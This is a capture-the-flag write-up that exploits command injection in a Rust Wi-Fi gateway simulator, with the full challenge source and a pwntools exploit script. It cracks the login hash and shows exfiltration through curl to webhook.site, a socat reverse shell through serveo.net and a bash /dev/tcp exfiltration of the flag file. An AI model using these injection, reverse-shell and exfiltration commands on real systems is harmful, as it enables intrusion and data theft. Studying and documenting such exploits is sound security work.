Description
Analysis
We are presented with a rust code:
NOTE
this is just a snippet, not the full code, if you’d like to read the full code you can find it at the end of this writeup.
use std::io::{self, Write};
use std::process::{Command, self};
use std::fs;
use md5;
use rand::{self, Rng};
pub static mut ESSID: String = String::new();
static BSSID: &str = "94:4e:6f:d7:bf:05";
static mut BAND: String = String::new();
static mut CHANNEL: i32 = 0;
static mut WIFI_PASSWORD: String = String::new();
static mut ID: u64 = 0;
fn check_password(password: String) -> bool{ ... }
fn auth() -> bool{ ... }
fn save_properties_to_file(){ ... }
fn show_properties(){ ... }
fn change_essid(){ ... }
fn change_wifi_band(){ ... }
fn change_channel(){ ... }
fn change_wifi_password() { ... }
fn menu(){ ... }
fn main(){
println!("----------------------------");
println!("| VS Gateway |");
println!("----------------------------");
if auth(){
run();
}
process::exit(0);
}
Upon basic observation, it seems that this is simulating a basic Wi-Fi access point management interface, where we could change the ESSID, password, channel and band, but to access the menu we need to login, the password is checked using the function check_password below, which calculates the md5 hash of the input and compares it with a hard coded one.
fn check_password(password: String) -> bool{
let digest = md5::compute(password.trim());
if format!("{:x}", digest) == "e10adc3949ba59abbe56e057f20f883e" {
true
}
else{
false
}
}Then there’s this function that seems to run a command to save the configurations into a configuration file, this function is called in every call to any function that changes access point’s parameters, and as we can see there’s clearly a command injection vulnerability here, in all of the parameters.
fn save_properties_to_file(){
unsafe{
let cmd = format!("echo \"{ESSID}\\n{BAND}\\n{CHANNEL}\\n{WIFI_PASSWORD}\" > /tmp/{ID}.conf");
Command::new("/bin/sh")
.arg("-c")
.arg(cmd)
.output()
.expect("Failed to execute command");
}
}All the functions that change parameters, have some restrictions for the input except for the change_wifi_password which doesn’t restrict the input, so we can use this to run arbitrary commands.
fn change_wifi_password(){
let mut input: String = String::new();
unsafe{
println!("Current password: {WIFI_PASSWORD}");
print!("New password: ");
io::stdout().flush().unwrap();
input.clear();
io::stdin().read_line(&mut input).expect("Failed to readline");
WIFI_PASSWORD = input.trim().to_owned();
println!("Done!");
}
save_properties_to_file();
}Solution
What we need to do is to reveal the flag by leveraging the command injection vulnerability that we found, but first we’ll need to figure out the credentials by cracking the hard coded hash: e10adc3949ba59abbe56e057f20f883e.
I checked the hash at https://crackstation.net/ and it was basically 123456:
After that, here’s a function to wrap any command that we want to run:
def wrap_command(cmd):
return f"\"; {cmd} ; echo \"".encode()And this function sets up a connection ready for command injection:
from pwn import *
def setup_connection():
io = remote("vsc.tf", 7003)
io.recvuntil(b"Username:")
io.sendline(b"admin")
io.recvuntil(b"Password:")
io.sendline(b"123456")
io.recvuntil(b">")
io.sendline(b"5")
return ioSo to send a command we simply do:
io = setup_connection()
io.sendline(wrap_command("echo Hello, Flag"))Attempt 1 : Just Read The Flag
At first I just wanted to read the flag, it’s easy that I could get a reverse shell, or simply run any command, but I wanted something basic, my goal was the flag, so I used curl with https://webhook.site:
curl -X POST -d $(cat flag.txt) https://webhook.site/<ID>
Basic right?, so the command kinda worked, it didn’t send back the flag for some reason, I didn’t understand what was happening, I did a sanity check by running the same command on my machine and everything worked perfectly, but why it won’t work remotely?
Attempt 2 : Let’s Get A Shell
Alright enough laziness, let’s get that shell, first I’ll setup a server by exposing a local port to the internet using serveo.net, in a terminal:
nc -lp 9999In another terminal:
ssh -R 1337:localhost:9999 serveo.netNow I’m ready to start the reverse shell, I’ll send the following command:
socat TCP4:serveo.net:1337 EXEC:/bin/bashNow I have a reverse shell, a root shell for some reason, and there’s a flag.txt file in the current working directory, but it doesn’t contain the flag, so I figured that the problem was that someone may have accidentally or intentionally overwrote the flag, I contacted the organizers and explained what happened, and they were already aware of the issue, after few minutes it was solved, but they removed socat, ping and curl (they put them back later, after I got the flag xD ).
This wouldn’t have happened if the organizers used a jail such as redpwn to provide a container for each connection, seperating player instances from each other, but I learned from the organizers that this is the only challenge that wasn’t configured in such a way for some reason.
Attempt 3 : Revenge
Ok, I’m fed up, now that I can’t use nor socat nor curl, it’s time to do some pure Linux-Fu, I’ll use the builtin exec, with some file redirections,:
/bin/bash -c "exec 3<>/dev/tcp/serveo.net/1337 && cat /home/user/flag.txt >&3 && exec 3>&-"here’s a break down of the above command:
/bin/bash -c: Using bash interpreter because it supports this method.exec 3<>/dev/tcp/serveo.net/1337: Open a read-write TCP connection to serveo.net:1337.cat /home/user/flag.txt >&3: Write the content offlag.txtto the file descriptor 3.exec 3>&-: Close the file descriptor 3.
In simple terms this command will connect to my server and send me the flag,
Let’s setup the server and port forwarding:
server = listen(8009)
serveo = process(f"ssh -R 1337:localhost:{server.lport} serveo.net".split(" "))Running the next lines and I got the flag:
cmd = f'/bin/bash -c "exec 3<>/dev/tcp/serveo.net/1337 && cat /home/user/flag.txt >&3 && exec 3>&-"'
io.sendline(wrap_command(cmd))The flag: vsctf{1s_1t_tru3_wh3n_rust_h4s_c0mm4nd_1nj3ct10n!??}
The Full Script
from pwn import *
context.log_level = "warn"
cmd = f'/bin/bash -c "exec 3<>/dev/tcp/serveo.net/1337 && cat /home/user/flag.txt >&3 && exec 3>&-"'
def setup_connection():
io = remote("vsc.tf", 7003)
io.recvuntil(b"Username:")
io.sendline(b"admin")
io.recvuntil(b"Password:")
io.sendline(b"123456")
io.recvuntil(b">")
io.sendline(b"5")
return io
def wrap_command(cmd):
return f"\"; {cmd} ; echo \"".encode()
server = listen(8009)
serveo = process(f"ssh -R 1337:localhost:{server.lport} serveo.net".split(" "))
io = setup_connection()
io.sendline(wrap_command(cmd))
connection = server.wait_for_connection()
received = connection.recv()
if b'vsctf' in received:
print(f"Got flag: {received.decode()}")
else:
print(f"Something went wrong, received: {received}")
server.close()
serveo.close()
io.close()Annexe
Challenge source code:
use std::io::{self, Write};
use std::process::{Command, self};
use std::fs;
use md5;
use rand::{self, Rng};
pub static mut ESSID: String = String::new();
static BSSID: &str = "94:4e:6f:d7:bf:05";
static mut BAND: String = String::new();
static mut CHANNEL: i32 = 0;
static mut WIFI_PASSWORD: String = String::new();
static mut ID: u64 = 0;
fn check_password(password: String) -> bool{
let digest = md5::compute(password.trim());
if format!("{:x}", digest) == "e10adc3949ba59abbe56e057f20f883e" {
true
}
else{
false
}
}
fn auth() -> bool{
let mut username = String::new();
let mut password = String::new();
print!("Username: ");
io::stdout().flush().unwrap();
io::stdin().read_line(&mut username).expect("Cannot read username!");
print!("Password: ");
io::stdout().flush().unwrap();
io::stdin().read_line(&mut password).expect("Cannot read username!");
if username.trim() == "admin" && check_password(password){
println!("Access granted!");
true
}
else{
println!("Access forbidden!");
false
}
}
fn save_properties_to_file(){
unsafe{
let cmd = format!("echo \"{ESSID}\\n{BAND}\\n{CHANNEL}\\n{WIFI_PASSWORD}\" > /tmp/{ID}.conf");
Command::new("/bin/sh")
.arg("-c")
.arg(cmd)
.output()
.expect("Failed to execute command");
}
}
fn show_properties(){
unsafe{
println!("--- PROPERTIES -----------------------------");
println!("Essid\t\t{ESSID}");
println!("Bssid\t\t{BSSID}");
println!("Band\t\t{BAND}GHz");
println!("Channel\t\t{CHANNEL}");
println!("Password\t{WIFI_PASSWORD}\n");
}
}
fn change_essid(){
let mut input: String = String::new();
let mut done = false;
unsafe{
println!("Current essid: {ESSID}");
while !done {
done = true;
print!("New essid: ");
io::stdout().flush().unwrap();
input.clear();
io::stdin().read_line(&mut input).expect("Failed to readline");
for c in input.trim().chars(){
if !"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ".contains(c){
done = false;
break
}
}
}
ESSID = input.trim().to_owned();
println!("Done!");
}
save_properties_to_file();
}
fn change_wifi_band(){
unsafe{
println!("Current band: {BAND}GHz");
if BAND=="2.4"{
BAND = String::from("5");
CHANNEL = 100;
}
else{
BAND = String::from("2.4");
CHANNEL = 6;
}
println!("New band: {BAND}GHz");
}
save_properties_to_file();
}
fn change_channel(){
let mut input: String = String::new();
let mut channel_tmp: i32;
unsafe{
print!("Current band: {BAND}GHz ");
if BAND == "2.4"{
println!("(from 1 to 11)")
}
else{
println!("(from 36 to 165)")
}
println!("Current channel: {CHANNEL}");
loop {
print!("New channel: ");
io::stdout().flush().unwrap();
input.clear();
io::stdin().read_line(&mut input).expect("Failed to readline");
channel_tmp = input.trim().parse().expect("Invalid number");
if BAND == "2.4" && (1..12).contains(&channel_tmp){
CHANNEL = channel_tmp;
break;
}
else if BAND == "5" && (36..166).contains(&channel_tmp){
CHANNEL = channel_tmp;
break;
}
}
println!("Done!\n");
}
save_properties_to_file();
}
fn change_wifi_password(){
let mut input: String = String::new();
unsafe{
println!("Current password: {WIFI_PASSWORD}");
print!("New password: ");
io::stdout().flush().unwrap();
input.clear();
io::stdin().read_line(&mut input).expect("Failed to readline");
WIFI_PASSWORD = input.trim().to_owned();
println!("Done!");
}
save_properties_to_file();
}
fn menu(){
println!("--- MENU ---------------------");
println!("1. Show properties");
println!("2. Change essid");
println!("3. Change wifi band");
println!("4. Change channel");
println!("5. Change wifi password");
println!("6. Exit");
print!("> ");
io::stdout().flush().unwrap();
}
fn load_data(){
unsafe{
ID = rand::thread_rng().gen_range(1..0xffffffffffffffff);
let cmd = format!("echo \"View Source Guest\\n2.4\\n6\\n123456789\" > /tmp/{ID}.conf");
Command::new("/bin/sh")
.arg("-c")
.arg(cmd)
.output()
.expect("Failed to execute command");
let datas = fs::read_to_string(format!("/tmp/{ID}.conf")).expect("Cannot load default data");
let mut parts = datas.split("\n");
ESSID = parts.nth(0).expect("Error when parsing essid").to_owned();
BAND = parts.nth(0).expect("Error when parsing band").to_owned();
CHANNEL = parts.nth(0).expect("Error when parsing channel").to_owned().parse().unwrap();
WIFI_PASSWORD = parts.nth(0).expect("Error when parsing wifi password").to_owned();
}
}
fn run(){
let mut choice;
let mut input = String::new();
load_data();
show_properties();
loop {
menu();
input.clear();
io::stdin().read_line(&mut input).expect("Cannot read input!");
choice = match input.trim().parse() {
Ok(num) => num,
_ => 0
};
match choice {
1 => show_properties(),
2 => change_essid(),
3 => change_wifi_band(),
4 => change_channel(),
5 => change_wifi_password(),
6 => {
unsafe{
fs::remove_file(format!("/tmp/{ID}.conf")).unwrap();
}
break
},
_ => {
println!("Invalid choice!");
},
}
}
}
fn main() {
println!("----------------------------");
println!("| VS Gateway |");
println!("----------------------------");
if auth(){
run();
}
process::exit(0);
}